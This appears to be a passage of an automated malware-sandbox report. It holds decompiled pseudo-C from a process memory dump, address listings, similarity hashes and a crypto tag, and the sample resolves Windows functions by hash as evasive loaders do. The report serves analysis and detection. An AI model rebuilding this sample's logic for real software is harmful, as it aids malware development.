												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x910], xmm0");
												E003C9640( &_v528, 0x20);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x918], xmm0");
												E003C9640( &_v532, 0x30);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x920], xmm0");
												E003C9640( &_v536, 0x40);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x928], xmm0");
												E003C9640( &_v540, 0x50);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x930], xmm0");
												E003C9640( &_v544, 0x60);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x938], xmm0");
												E003C9640( &_v548, 0x70);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x940], xmm0");
												E003C9640( &_v552, 0x80);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x948], xmm0");
												E003C9640( &_v556, 0x90);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x950], xmm0");
												E003C9640( &_v560, 0xa0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x958], xmm0");
												E003C9640( &_v564, 0xb0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x960], xmm0");
												E003C9640( &_v568, 0xc0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x968], xmm0");
												E003C9640( &_v572, 0xd0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x970], xmm0");
												E003C9640( &_v576, 0xe0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x978], xmm0");
												E003C9640( &_v580, 0xf0);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x980], xmm0");
												E003C9640( &_v584, 0x100);
												asm("movq xmm0, [eax+0x8]");
												asm("movq [esp+0x988], xmm0");
												E003C9640( &_v588, 0);
												asm("movq xmm0, [eax+0x8]");
												_t819 =  &_v544;
												asm("movdqu [esp+0x60], xmm0");
												E003B0B70( &_v544, 0, 0x30);
												_t835 = _t838 + 0xc;
												asm("movd xmm4, edi");
												asm("cdq");
												asm("pxor xmm0, xmm0");
												asm("movdqu [eax-0x950], xmm0");
												_v2992 = _t803;
												asm("movd xmm1, edx");
												asm("cdq");
												asm("movd xmm3, eax");
												asm("punpckldq xmm4, xmm1");
												asm("movd xmm2, edx");
												asm("punpckldq xmm3, xmm2");
												asm("movdqu [esp+0x70], xmm3");
												asm("movdqu [eax-0x960], xmm4");
												_v2988 = _t595;
												do {
													asm("movdqu xmm0, [esp+0x60]");
													asm("movq [esp], xmm0");
													asm("pxor xmm5, xmm5");
													_v2860 = 6;
													asm("movdqu xmm1, [esp+0x80]");
													asm("movq [esp+0xc], xmm1");
													asm("movdqu xmm2, [esp+0x90]");
													asm("movq [esp+0x14], xmm2");
													asm("movq [esp+0x1c], xmm5");
													asm("movdqu xmm3, [esp+0x70]");
													asm("movq xmm4, [0x3d93d8]");
													asm("movq [esp+0x24], xmm3");
													asm("movq [esp+0x2c], xmm4");
													asm("movq [esp+0x34], xmm5");
													_t599 = E003D04B0(_t803, _t819);
													_t803 =  *(_t835 + 0x9e0);
													_t819 =  *((intOrPtr*)(_t835 + 0x9e4));
													asm("movq xmm0, [esp+0x9f8]");
													__eflags =  ~( *(_t835 + 0x9e8)) + _t803 |  ~_v328 + _t819;
													asm("movdqu xmm1, [esp+0x90]");
													asm("paddq xmm1, xmm0");
													asm("movdqu [esp+0x90], xmm1");
													if(( ~( *(_t835 + 0x9e8)) + _t803 |  ~_v328 + _t819) != 0) {
														goto L35;
													} else {
														_push(0x400);
														E003C9350( &_v356);
														 *(_t835 + 0x5c) = E003C9640(_t835 + 0x9d4, 0);
														 *((intOrPtr*)(_t835 + 0x58)) = E003C9640(_t835 + 0x9d4, 0);
														E003C9650( &_v368);
														asm("movdqu xmm0, [esp+0x60]");
														asm("movd xmm6, ecx");
														asm("movq [esp], xmm0");
														_v2872 = 6;
														asm("pxor xmm7, xmm7");
														asm("movdqu xmm1, [esp+0x80]");
														asm("movq xmm2, [0x3d93d0]");
														asm("movq [esp+0xc], xmm1");
														_v2860 = _t803;
														 *((intOrPtr*)(_t835 + 0x18)) = _t819;
														asm("movq [esp+0x1c], xmm2");
														asm("cdq");
														asm("movd xmm4, eax");
														asm("movd xmm3, edx");
														asm("cdq");
														asm("punpckldq xmm4, xmm3");
														asm("movq [esp+0x24], xmm4");
														asm("movd xmm5, edx");
														asm("punpckldq xmm6, xmm5");
														asm("movq [esp+0x2c], xmm6");
														asm("movq [esp+0x34], xmm7");
														_t562 = E003D04B0(_t803, _t819);
														__eflags = _t562;
														if(_t562 != 0) {
															L56:
															E003C9510(_t835 + 0x9d0);
															_t803 = 0xe5ab9b45;
														} else {
															__eflags =  *( *(_t835 + 0x5c)) & 0x0000ffff;
															if(__eflags == 0) {
																goto L56;
															} else {
																E003B83B0(_t835 + 0xa28);
																_t819 = _t835 + 0xa30;
																E003C2E60(_t835 + 0xa30, __eflags, _t835 + 0xa30, 0x5c);
																E003C1020(_t835 + 0xa30, _t835 + 0xa38);
																_t571 = E003CD620( *((intOrPtr*)(_t835 + 0xa38)), E003C6040( *((intOrPtr*)(_t835 + 0xa38)), 0x7fffffff));
																E003C0B10(_t835 + 0xa38);
																E003C0B10(_t835 + 0xa30);
																E003C0B10(_t835 + 0xa28);
																E003C9510( &_v372);
																_t803 = _t571 ^ 0x38ba5c7b;
																__eflags = _t803;
															}
														}
														__eflags = _t803 - 0xa1310f65;
														if(__eflags == 0) {
															_t803 =  *(_t835 + 0x50);
															_t595 =  *(_t835 + 0x54);
															_t820 =  *(_t835 + 0x9e0);
															 *((intOrPtr*)(_t835 + 0x58)) =  *((intOrPtr*)(_t835 + 0x9e4));
														} else {
															goto L35;
														}
													}
													L37:
													E003ADE60( &_v372, _t803, __eflags, _t820,  *((intOrPtr*)(_t835 + 0x58)));
													E003CA110( &_v396);
													 *((intOrPtr*)(_t835 + 0x40)) = 0xe2d27ff4;
													asm("pxor xmm0, xmm0");
													asm("movq [esp+0x48], xmm0");
													E003C9670( &_v396, E003C9650( &_v396) + 0x10);
													E003C9640( &_v400, E003C9650( &_v400) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													asm("pxor xmm1, xmm1");
													asm("movups [eax], xmm0");
													_v2820 = 0x69121530;
													asm("movq [esp+0x48], xmm1");
													E003C9670(_t835 + 0x9b4, E003C9650(_t835 + 0x9b0) + 0x10);
													E003C9640( &_v408, E003C9650( &_v408) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													asm("pxor xmm1, xmm1");
													asm("movups [eax], xmm0");
													 *((intOrPtr*)(_t835 + 0x40)) = 0x77be1f6;
													asm("movq [esp+0x48], xmm1");
													E003C9670( &_v412, E003C9650( &_v412) + 0x10);
													E003C9640( &_v416, E003C9650( &_v416) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													asm("pxor xmm1, xmm1");
													asm("movups [eax], xmm0");
													 *((intOrPtr*)(_t835 + 0x40)) = 0xf1c64384;
													asm("movq [esp+0x48], xmm1");
													E003C9670( &_v420, E003C9650( &_v420) + 0x10);
													__eflags = E003C9650(_t835 + 0x9b0) + 0xfffffff0;
													E003C9640(_t835 + 0x9b4, E003C9650(_t835 + 0x9b0) + 0xfffffff0);
													asm("movups xmm0, [esp+0x40]");
													_push( &_v428);
													_push(_v2820);
													_push(_t820);
													asm("movups [edx], xmm0");
													E003AE780( &_v412, _t820, __eflags);
													E003C9640(_t835 + 0x9b4, 0);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [esp+0x998], xmm0");
													E003C9640( &_v444, 0x10);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [esp+0x9a0], xmm0");
													E003C9640( &_v448, 0x20);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [esp+0x990], xmm0");
													E003C9640( &_v452, 0x30);
													asm("movq xmm0, [eax+0x8]");
													asm("movq [ecx-0x18], xmm0");
													E003C9510(_t835 + 0x9c0);
													E003C9510( &_v456);
													asm("cdq");
													asm("movd xmm1, eax");
													asm("movd xmm0, edx");
													asm("cdq");
													asm("movd xmm3, eax");
													asm("punpckldq xmm1, xmm0");
													asm("movq [esp+0x900], xmm1");
													asm("movd xmm2, edx");
													asm("punpckldq xmm3, xmm2");
													asm("movq [esp+0x908], xmm3");
													E003C9710( &_v280, _t835 + 0x4c4, 0x4f0);
													_t785 = _t835 + 0xa58;
													_t370 = E003AACD0(_t595, _t835 + 0xa58, __eflags, 0x5c8,  &_v288);
													goto L38;
													L35:
													__eflags = _t599;
												} while (_t599 == 0);
												_t820 = 0;
												__eflags = 0;
												_t803 =  *(_t835 + 0x50);
												_t595 =  *(_t835 + 0x54);
												 *((intOrPtr*)(_t835 + 0x58)) = 0;
												goto L37;
											}
											L38:
											_t817 = _t370;
											__eflags = _t817;
											if(_t817 != 0) {
												__eflags = _t595;
												_push(0);
												_t597 =  !=  ? _t595 + 0xc : _t595;
												_push( !=  ? _t595 + 0xc : _t595);
												_t387 = E003D1A80(_t785, _t595,  &_v296, 0x2710);
												_t835 = _t835 + 0x10;
												_t595 = 0;
												__eflags = _t387;
												_t817 =  !=  ? 0 : _t817;
											}
											__eflags = _v160;
											if(_v160 == 0) {
												L45:
												__eflags = _v156;
												if(_v156 == 0) {
													L50:
													E003D2530(_t595,  &_v296, _t785, _t803, _t817);
													E003C9510( &_v216);
													E003C9510(_t835 + 0xa50);
													E003C9510( &_v248);
													E003D1F40( &_v152, _t785, _t817);
													return _t817;
												} else {
													_t785 = E003B15C0(0x588ab3ea, 0xea812079);
													__eflags = _t785;
													if(_t785 != 0) {
														_t595 = 0;
														__eflags = 0;
														 *_t785(_t803, _v156, 0xffffffff,  &_v176, 0, 0, 1);
													}
													_t379 = E003B15C0(0x588ab3ea, 0x35b39b2b);
													__eflags = _t379;
													if(_t379 == 0) {
														goto L50;
													} else {
														_push(_v176);
														asm("int3");
														return _t379;
													}
												}
											} else {
												_t785 = E003B15C0(0x588ab3ea, 0xea812079);
												__eflags = _t785;
												if(_t785 != 0) {
													_t595 = 0;
													__eflags = 0;
													 *_t785(_t803, _v160, 0xffffffff,  &_v176, 0, 0, 1);
												}
												_t383 = E003B15C0(0x588ab3ea, 0x35b39b2b);
												__eflags = _t383;
												if(_t383 == 0) {
													goto L45;
												} else {
													_push(_v176);
													asm("int3");
													return _t383;
												}
											}
										} else {
											_t783 = _t833 + 0x4bc;
											 *_t621(0xffffffff, _v276, _t803, _t833 + 0x4bc, 0, 0, 2);
											__eflags = 0;
											if(0 == 0) {
												goto L26;
											} else {
												__eflags = _v196;
												if(_v196 != 0) {
													E003CBE30(_t833 + 0xa78, _t812);
												}
												__eflags = _v168;
												if(_v168 == 0) {
													goto L54;
												} else {
													_t585 = E003B15C0(0x588ab3ea, 0xea812079);
													__eflags = _t585;
													if(_t585 == 0) {
														_t586 = E003B15C0(0x588ab3ea, 0x35b39b2b);
														__eflags = _t586;
														if(_t586 == 0) {
															goto L54;
														} else {
															_push( *(_t833 + 0x40));
															asm("int3");
															return _t586;
														}
													} else {
														__eflags = 0;
														_push(1);
														_push(0);
														_push(0);
														_push(_t833 + 0x40);
														_push(0xffffffff);
														_push(_v168);
														_push(_t803);
														asm("int3");
														return _t585;
													}
												}
											}
										}
									} else {
										_t783 = _t833 + 0x4bc;
										 *_t620(0xffffffff, _v172, _t803, _t833 + 0x4bc, 0, 0, 2);
										__eflags = 0;
										if(0 == 0) {
											goto L17;
										} else {
											__eflags = _v196;
											if(_v196 != 0) {
												goto L53;
											} else {
											}
											goto L54;
										}
									}
								} else {
									_push(_v160);
									_push(0xffffffff);
									asm("int3");
									return _t329;
								}
							}
						} else {
							__eflags = _v128;
							if(_v128 != 0) {
								L53:
								E003CBE30(_t833 + 0xa78, _t812);
							} else {
							}
							L54:
							E003D2530(_t595, _t833 + 0xa10, _t783, _t803, _t812);
							E003C9510( &_v224);
							E003C9510( &_v240);
							E003C9510(_t833 + 0xa40);
							E003D1F40( &_v160, _t783, _t812);
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = 0;
						_push(0);
						_push(0x8000000);
						_push(4);
						_push(_t833 + 0xa90);
						_push(0);
						_push(0xf001f);
						_push(_t833 + 0xaa4);
						asm("int3");
						return _t317;
					}
				} else {
					E003D1F40( &_v72, 0x1d, _t812);
					return 1;
				}
			}

0x003a1571
0x003a1577
0x003a1579
0x003a157f
0x003a1581
0x003a1592
0x003a1597
0x003a15a7
0x003a15b3
0x003a15c8
0x003a15e8
0x003a15f1
0x003a15f6
0x003a15ff
0x003a1604
0x003a160d
0x003a1612
0x003a1614
0x003a1617
0x003a161a
0x003a161f
0x003a1621
0x003a1625
0x003a162a
0x003a162a
0x003a162f
0x003a1631
0x003a1634
0x003a1639
0x003a163a
0x003a1642
0x003a1644
0x003a1649
0x003a1654
0x003a1658
0x003a1660
0x003a1670
0x003a1681
0x003a1686
0x003a1688
0x003a16b2
0x003a16c8
0x003a16cd
0x003a16d2
0x003a16e9
0x003a16f0
0x003a16f7
0x003a16fe
0x003a1714
0x003a1716
0x003a1718
0x003a26f9
0x003a26fd
0x003a2701
0x003a2706
0x003a270c
0x003a2737
0x003a273b
0x003a273d
0x003a273f
0x00000000
0x003a2745
0x003a2745
0x003a274d
0x00000000
0x00000000
0x00000000
0x003a274d
0x003a171e
0x003a171e
0x003a1727
0x003a173e
0x003a1743
0x003a1750
0x003a1755
0x003a1757
0x003a1764
0x003a177e
0x003a1780
0x003a1782
0x003a17b5
0x003a17bc
0x003a17d2
0x003a17d4
0x003a17d6
0x003a186a
0x003a1871
0x003a1878
0x003a1880
0x003a1889
0x003a1889
0x003a1895
0x003a18a2
0x003a18a4
0x003a18a7
0x003a18b0
0x003a18c3
0x003a18cf
0x003a18e8
0x003a18fb
0x003a1912
0x003a1917
0x003a191c
0x003a1921
0x003a1924
0x003a27e7
0x003a27ec
0x003a27f6
0x003a27fd
0x003a2817
0x003a282d
0x003a2843
0x003a2859
0x003a286f
0x003a2885
0x003a289b
0x003a28b1
0x003a28c7
0x003a28dd
0x003a28f3
0x003a2909
0x003a291f
0x003a2935
0x003a294b
0x003a2961
0x003a2977
0x003a298d
0x003a29a3
0x003a29b4
0x003a29c0
0x003a29ce
0x003a29d5
0x003a29ed
0x003a29fb
0x003a29fc
0x003a2a01
0x003a2a08
0x003a192a
0x003a1939
0x003a193e
0x003a1948
0x003a1956
0x003a1960
0x003a1962
0x003a1967
0x003a1976
0x003a197a
0x003a1990
0x003a19ac
0x003a19b1
0x003a19bd
0x003a19c1
0x003a19c4
0x003a19cc
0x003a19e2
0x003a19fe
0x003a1a03
0x003a1a0f
0x003a1a13
0x003a1a16
0x003a1a1e
0x003a1a34
0x003a1a50
0x003a1a55
0x003a1a61
0x003a1a65
0x003a1a68
0x003a1a70
0x003a1a86
0x003a1aa2
0x003a1aa7
0x003a1ab3
0x003a1ab7
0x003a1aba
0x003a1ac2
0x003a1ad8
0x003a1af4
0x003a1af9
0x003a1b05
0x003a1b09
0x003a1b0c
0x003a1b14
0x003a1b2a
0x003a1b46
0x003a1b4b
0x003a1b57
0x003a1b5b
0x003a1b5e
0x003a1b66
0x003a1b7c
0x003a1b98
0x003a1b9d
0x003a1ba9
0x003a1bad
0x003a1bb0
0x003a1bb8
0x003a1bce
0x003a1bea
0x003a1bef
0x003a1bfb
0x003a1bff
0x003a1c02
0x003a1c0a
0x003a1c20
0x003a1c3c
0x003a1c41
0x003a1c4d
0x003a1c51
0x003a1c54
0x003a1c5c
0x003a1c72
0x003a1c8e
0x003a1c93
0x003a1c9f
0x003a1ca3
0x003a1ca6
0x003a1cae
0x003a1cc4
0x003a1ce0
0x003a1ce5
0x003a1cf1
0x003a1cf5
0x003a1cf8
0x003a1d00
0x003a1d16
0x003a1d32
0x003a1d37
0x003a1d43
0x003a1d47
0x003a1d4a
0x003a1d52
0x003a1d68
0x003a1d84
0x003a1d89
0x003a1d95
0x003a1d99
0x003a1d9c
0x003a1da4
0x003a1dba
0x003a1dd6
0x003a1ddb
0x003a1de7
0x003a1deb
0x003a1dee
0x003a1df6
0x003a1e0c
0x003a1e28
0x003a1e2d
0x003a1e39
0x003a1e3d
0x003a1e40
0x003a1e48
0x003a1e5e
0x003a1e7a
0x003a1e7f
0x003a1e8b
0x003a1e8f
0x003a1e92
0x003a1e9a
0x003a1eb0
0x003a1ec1
0x003a1ecc
0x003a1ed1
0x003a1ee2
0x003a1ee5
0x003a1ef3
0x003a1ef8
0x003a1efd
0x003a1f0f
0x003a1f14
0x003a1f19
0x003a1f2b
0x003a1f30
0x003a1f35
0x003a1f47
0x003a1f4c
0x003a1f51
0x003a1f63
0x003a1f68
0x003a1f6d
0x003a1f7f
0x003a1f84
0x003a1f89
0x003a1f9b
0x003a1fa0
0x003a1fa5
0x003a1fba
0x003a1fbf
0x003a1fc4
0x003a1fd9
0x003a1fde
0x003a1fe3
0x003a1ff8
0x003a1ffd
0x003a2002
0x003a2017
0x003a201c
0x003a2021
0x003a2036
0x003a203b
0x003a2040
0x003a2055
0x003a205a
0x003a205f
0x003a2074
0x003a2079
0x003a207e
0x003a2093
0x003a2098
0x003a209d
0x003a20b2
0x003a20b7
0x003a20bc
0x003a20ce
0x003a20d3
0x003a20d8
0x003a20df
0x003a20ea
0x003a20ef
0x003a20f4
0x003a20f8
0x003a20f9
0x003a2104
0x003a210c
0x003a2110
0x003a2114
0x003a2115
0x003a2119
0x003a211d
0x003a2121
0x003a2125
0x003a212b
0x003a2133
0x003a2137
0x003a2137
0x003a213d
0x003a2142
0x003a2146
0x003a214e
0x003a2157
0x003a215d
0x003a2166
0x003a216c
0x003a2172
0x003a2178
0x003a2180
0x003a2186
0x003a218c
0x003a2197
0x003a21ab
0x003a21b4
0x003a21bd
0x003a21c6
0x003a21c8
0x003a21d1
0x003a21d5
0x003a21de
0x00000000
0x003a21e4
0x003a21e4
0x003a21f0
0x003a2203
0x003a2215
0x003a2220
0x003a2227
0x003a222d
0x003a2231
0x003a2236
0x003a223e
0x003a2242
0x003a224b
0x003a2253
0x003a2259
0x003a225d
0x003a2261
0x003a226b
0x003a226c
0x003a2272
0x003a2276
0x003a2277
0x003a227b
0x003a2281
0x003a2285
0x003a2289
0x003a228f
0x003a2295
0x003a229a
0x003a229c
0x003a27c5
0x003a27cc
0x003a27d1
0x003a22a2
0x003a22a9
0x003a22ab
0x00000000
0x003a22b1
0x003a22bb
0x003a22c0
0x003a22d1
0x003a22e0
0x003a22fc
0x003a230a
0x003a2311
0x003a231d
0x003a2329
0x003a232e
0x003a232e
0x003a232e
0x003a22ab
0x003a2334
0x003a233a
0x003a27ad
0x003a27b1
0x003a27b5
0x003a27bc
0x00000000
0x00000000
0x00000000
0x003a233a
0x003a2356
0x003a2364
0x003a2370
0x003a2375
0x003a2384
0x003a2388
0x003a239e
0x003a23ba
0x003a23bf
0x003a23cb
0x003a23cf
0x003a23d2
0x003a23da
0x003a23f0
0x003a240c
0x003a2411
0x003a241d
0x003a2421
0x003a2424
0x003a242c
0x003a2442
0x003a245e
0x003a2463
0x003a246f
0x003a2473
0x003a2476
0x003a247e
0x003a2494
0x003a24a5
0x003a24b0
0x003a24b7
0x003a24c3
0x003a24c4
0x003a24c8
0x003a24c9
0x003a24d5
0x003a24e3
0x003a24e8
0x003a24ed
0x003a24ff
0x003a2504
0x003a2509
0x003a251b
0x003a2520
0x003a2525
0x003a2537
0x003a253c
0x003a2548
0x003a254d
0x003a2559
0x003a2565
0x003a2566
0x003a2571
0x003a2575
0x003a2576
0x003a257a
0x003a257e
0x003a2587
0x003a258b
0x003a258f
0x003a25ac
0x003a25c0
0x003a25c7
0x00000000
0x003a2340
0x003a2340
0x003a2340
0x003a2348
0x003a2348
0x003a234a
0x003a234e
0x003a2352
0x00000000
0x003a2352
0x003a25cc
0x003a25cc
0x003a25d0
0x003a25d2
0x003a25d4
0x003a25d9
0x003a25db
0x003a25de
0x003a25ec
0x003a25f1
0x003a25f4
0x003a25f6
0x003a25f8
0x003a25f8
0x003a25fb
0x003a2603
0x003a2650
0x003a2650
0x003a2658
0x003a26a5
0x003a26ac
0x003a26b8
0x003a26c4
0x003a26d0
0x003a26dc
0x003a26ef
0x003a265a
0x003a2669
0x003a266b
0x003a266d
0x003a266f
0x003a266f
0x003a2687
0x003a2687
0x003a2693
0x003a2698
0x003a269a
0x00000000
0x003a269c
0x003a269c
0x003a26a3
0x003a26a4
0x003a26a4
0x003a269a
0x003a2605
0x003a2614
0x003a2616
0x003a2618
0x003a261a
0x003a261a
0x003a2632
0x003a2632
0x003a263e
0x003a2643
0x003a2645
0x00000000
0x003a2647
0x003a2647
0x003a264e
0x003a264f
0x003a264f
0x003a2645
0x003a17dc
0x003a17de
0x003a17f4
0x003a17f6
0x003a17f8
0x00000000
0x003a17fa
0x003a17fa
0x003a1802
0x003a180b
0x003a180b
0x003a1810
0x003a1818
0x00000000
0x003a181e
0x003a1828
0x003a182d
0x003a182f
0x003a1852
0x003a1857
0x003a1859
0x00000000
0x003a185f
0x003a185f
0x003a1863
0x003a1864
0x003a1864
0x003a1831
0x003a1831
0x003a1837
0x003a1839
0x003a183a
0x003a183b
0x003a183c
0x003a183e
0x003a1845
0x003a1846
0x003a1847
0x003a1847
0x003a182f
0x003a1818
0x003a17f8
0x003a1784
0x003a1786
0x003a179c
0x003a179e
0x003a17a0
0x00000000
0x003a17a2
0x003a17a2
0x003a17aa
0x00000000
0x00000000
0x003a17b0
0x00000000
0x003a17aa
0x003a17a0
0x003a1759
0x003a1759
0x003a1760
0x003a1762
0x003a1763
0x003a1763
0x003a1757
0x003a16d4
0x003a16d4
0x003a16dc
0x003a274f
0x003a2756
0x00000000
0x003a16e2
0x003a275b
0x003a2762
0x003a276e
0x003a277a
0x003a2786
0x003a2792
0x003a2797
0x003a27a5
0x003a27a5
0x003a168a
0x003a168a
0x003a1693
0x003a1694
0x003a1699
0x003a169b
0x003a169c
0x003a169d
0x003a16a9
0x003a16aa
0x003a16ab
0x003a16ab
0x003a15ca
0x003a15d1
0x003a15e7
0x003a15e7

Strings

)8GV, xrefs: 003A1956
)8GV, xrefs: 003A27FD

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID: )8GV$)8GV
API String ID: 0-993736920
Opcode ID: 74db9755084875726ab60468213754cfeb7853615bc184d34fd30dc173f051e0
Instruction ID: 38f2f15dea632067e54e90d801a47659b34e9ef8f004eac30c5ee4bc0efa7b2a
Opcode Fuzzy Hash: 74db9755084875726ab60468213754cfeb7853615bc184d34fd30dc173f051e0
Instruction Fuzzy Hash: 03A251719187809AE332EF24C956BEFB3E4EFD2324F014A1EB5899A193EF305954C752

Uniqueness

Uniqueness Score: -1.00%

Function 003AACD0, Relevance: 2.9, Strings: 1, Instructions: 1641
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E003AACD0(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v28;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				char _v120;
				signed int _v124;
				char _v128;
				char _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				char _v148;
				char _v156;
				char _v160;
				char _v164;
				signed int _v168;
				char _v172;
				char _v176;
				char _v180;
				signed int _v192;
				char _v196;
				char _v200;
				char _v216;
				char _v220;
				char _v232;
				char _v248;
				void* _v252;
				char _v256;
				char _v260;
				char _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				void* _v276;
				char _v280;
				signed int _v284;
				char _v288;
				char _v292;
				intOrPtr _v296;
				signed int _v300;
				signed int _v304;
				char _v308;
				char _v312;
				char _v316;
				signed int _v320;
				char _v324;
				char _v328;
				char _v332;
				char _v336;
				char _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				void* _v364;
				char _v368;
				void* _v372;
				char _v376;
				char _v380;
				char _v384;
				char _v388;
				char _v392;
				char _v396;
				char _v400;
				void* _v404;
				char _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				void* _v440;
				char _v444;
				void* _v448;
				char _v452;
				char _v460;
				intOrPtr _v464;
				void* _v468;
				void* _v472;
				void* _v476;
				char _v480;
				void* _v484;
				void* _v488;
				intOrPtr _v492;
				void* _v496;
				void* _v500;
				void* _v504;
				intOrPtr _v508;
				void* _v520;
				void* _v524;
				void* _v528;
				void* _v532;
				char _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				void* _v548;
				intOrPtr _v552;
				void* _v556;
				char _v560;
				signed short* _v564;
				signed int _v568;
				signed int _v572;
				char _v576;
				intOrPtr _v580;
				signed int _v584;
				void* _v588;
				void* _v592;
				void* _v596;
				char _v604;
				char _v612;
				char _v616;
				char _v620;
				char _v624;
				signed int _v628;
				char _v636;
				intOrPtr _v640;
				char _v644;
				void* _v648;
				signed int _v656;
				char _v660;
				char _v668;
				char _v676;
				signed int _v680;
				intOrPtr _v700;
				void* _v704;
				void* _v708;
				void* _v716;
				intOrPtr _v724;
				intOrPtr _v732;
				signed int _v736;
				signed int _v740;
				intOrPtr _v744;
				void* _v748;
				void* _v756;
				void* _v764;
				void* _v772;
				void* _v776;
				void* _v780;
				void* _v784;
				void* _v788;
				void* _v796;
				void* _v800;
				void* _v804;
				void* _v808;
				void* _v812;
				void* _v816;
				void* _v820;
				void* _v824;
				void* _v828;
				void* _v836;
				void* _v840;
				void* _v844;
				void* _v848;
				void* _v852;
				void* _v856;
				void* _v860;
				void* _v868;
				void* _v872;
				void* _v876;
				void* _v880;
				void* _v888;
				void* _v892;
				void* _v908;
				void* _v940;
				void* _v944;
				void* _v948;
				void* _v952;
				void* _v956;
				void* _v960;
				void* _v964;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t632;
				void* _t667;
				signed int _t672;
				char _t747;
				signed int _t768;
				signed int _t770;
				signed int _t778;
				char* _t781;
				signed int _t782;
				signed int _t793;
				signed int _t795;
				char* _t798;
				signed int _t799;
				signed int _t810;
				signed int _t812;
				signed int _t813;
				signed int _t815;
				intOrPtr _t865;
				intOrPtr _t900;
				signed int _t911;
				char _t974;
				signed char* _t1005;
				signed int _t1006;
				void* _t1008;
				void* _t1011;
				intOrPtr _t1017;
				signed int _t1021;
				char _t1030;
				char _t1035;
				signed int _t1036;
				char* _t1038;
				signed int _t1040;
				signed int _t1041;
				signed int* _t1043;
				signed int _t1044;
				void* _t1045;
				void* _t1047;
				void* _t1055;
				void* _t1065;
				char* _t1154;
				signed int _t1326;
				signed short* _t1435;
				void* _t1438;
				char* _t1449;
				char* _t1452;
				signed int _t1455;
				signed int _t1457;
				signed int _t1459;
				signed int _t1460;
				signed int _t1465;
				signed int _t1466;
				signed int _t1467;
				signed int _t1481;
				void* _t1485;
				signed int _t1487;
				char _t1498;
				void* _t1499;
				void* _t1500;
				char _t1503;
				void* _t1514;
				void* _t1518;
				char _t1531;
				signed int _t1537;
				signed int _t1538;
				signed int _t1539;
				char _t1540;
				intOrPtr _t1542;
				signed int _t1543;
				signed int _t1545;
				void* _t1547;
				void* _t1567;
				void* _t1569;
				signed int _t1570;
				void* _t1572;
				void* _t1573;
				void* _t1574;
				void* _t1576;

				_t1572 = (_t1570 & 0xfffffff0) - 0x254;
				_v540 = __edx;
				_v28 = __ecx;
				_t1534 =  *((intOrPtr*)(__ecx + 0xc));
				E003B15C0(0x57325ee3, 0xb7186560);
				_push(0);
				E003C9350( &_v192);
				_v180 = 0;
				_push(0);
				E003C9350( &_v176);
				_push(0);
				E003C9350( &_v76);
				_v536 = 0x58d59bc9;
				asm("pxor xmm0, xmm0");
				asm("movq [esp+0x68], xmm0");
				E003C9670( &_v80, E003C9650( &_v80) + 0x10);
				E003C9640( &_v84, E003C9650( &_v84) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v544 = 0x3b4caff7;
				asm("movq [esp+0x68], xmm1");
				E003C9670( &_v88, E003C9650( &_v88) + 0x10);
				E003C9640( &_v92, E003C9650( &_v92) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v552 = 0xd9ff67e3;
				asm("movq [esp+0x68], xmm1");
				E003C9670( &_v96, E003C9650( &_v96) + 0x10);
				E003C9640( &_v100, E003C9650( &_v100) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v560 = 0xbcd9ca71;
				asm("movq [esp+0x68], xmm1");
				E003C9670( &_v104, E003C9650( &_v104) + 0x10);
				E003C9640( &_v108, E003C9650( &_v108) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v568 = 0x1be15feb;
				asm("movq [esp+0x68], xmm1");
				E003C9670( &_v112, E003C9650( &_v112) + 0x10);
				E003C9640( &_v116, E003C9650( &_v116) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("pxor xmm1, xmm1");
				asm("movups [eax], xmm0");
				_v576 = 0xebe915fa;
				asm("movq [esp+0x68], xmm1");
				E003C9670( &_v120, E003C9650( &_v120) + 0x10);
				E003C9640( &_v124, E003C9650( &_v124) + 0xfffffff0);
				asm("movups xmm0, [esp+0x60]");
				asm("movups [eax], xmm0");
